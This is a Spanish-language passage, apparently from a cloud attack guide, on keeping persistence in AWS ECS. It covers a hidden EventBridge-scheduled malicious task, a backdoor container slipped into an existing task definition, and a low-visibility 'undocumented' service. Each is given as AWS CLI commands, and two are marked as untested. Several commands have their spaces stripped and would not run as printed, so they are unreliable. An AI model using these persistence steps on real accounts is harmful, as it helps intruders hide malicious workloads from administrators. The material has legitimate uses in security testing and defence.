Un atacante puede crear una tarea periódica oculta en ECS utilizando Amazon EventBridge para programar la ejecución de una tarea maliciosa de forma periódica. Esta tarea puede realizar reconocimiento, exfiltrar datos o mantener la persistencia en la cuenta de AWS.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
Contenedor con Puerta Trasera en Definición de Tarea ECS Existente
TODO: Probar
Un atacante puede agregar un contenedor con puerta trasera sigiloso en una definición de tarea ECS existente que se ejecuta junto con contenedores legítimos. El contenedor con puerta trasera puede utilizarse para persistencia y realizar actividades maliciosas.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
Servicio ECS No Documentado
TODO: Probar
Un atacante puede crear un servicio ECS no documentado que ejecute una tarea maliciosa. Al establecer el número deseado de tareas al mínimo y desactivar el registro, se vuelve más difícil para los administradores notar el servicio malicioso.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"